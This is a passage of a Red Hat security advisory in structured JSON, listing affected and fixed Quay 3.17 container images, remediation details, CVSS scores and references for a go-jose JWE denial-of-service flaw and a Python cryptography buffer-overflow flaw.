          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-34986",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8",
          "url": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants",
          "url": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants"
        }
      ],
      "release_date": "2026-04-06T16:22:45.353000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object"
    },
    {
      "cve": "CVE-2026-39892",
      "cwe": {
        "id": "CWE-131",
        "name": "Incorrect Calculation of Buffer Size"
      },
      "discovery_date": "2026-04-08T22:00:59.416053+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456735"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the cryptography library. This vulnerability occurs when a non-contiguous buffer is passed to certain application programming interfaces (APIs) that accept Python buffers, such as Hash.update(). A remote attacker could exploit this to cause a buffer overflow, potentially leading to a denial of service.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "cryptography: Cryptography: Buffer overflow via non-contiguous buffer in API",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "In default configurations Red Hat products isolate service processes from total system access. Should an attacker be able to exploit this vulnerability their impact will be limited to that service account and they will not have access to the broader system.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456735",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456735"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-39892",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39892",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "http://www.openwall.com/lists/oss-security/2026/04/08/12",
          "url": "http://www.openwall.com/lists/oss-security/2026/04/08/12"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/cryptography/commit/622d672e429a7cff836a23c5903683dbec1901f5",
          "url": "https://github.com/pyca/cryptography/commit/622d672e429a7cff836a23c5903683dbec1901f5"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-p423-j2cm-9vmq",
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-p423-j2cm-9vmq"
        }
      ],
      "release_date": "2026-04-08T20:49:41.967000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
